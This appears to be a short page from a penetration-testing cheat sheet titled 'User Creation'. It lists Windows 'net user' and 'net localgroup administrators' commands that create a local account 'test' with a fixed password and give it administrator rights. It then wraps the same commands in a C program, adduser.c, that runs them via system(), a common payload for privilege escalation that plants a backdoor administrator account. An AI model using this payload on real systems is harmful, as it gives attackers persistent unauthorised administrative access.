User Creation
Linux
Windows
net user test password123! /add
net localgroup administrators test /addmousepad adduser.c
#include <stdlib.h>
int main () {
int i;
i = system ("net user test password123! /add");
i = system ("net localgroup administrators test /add");
return 0;
}Last updated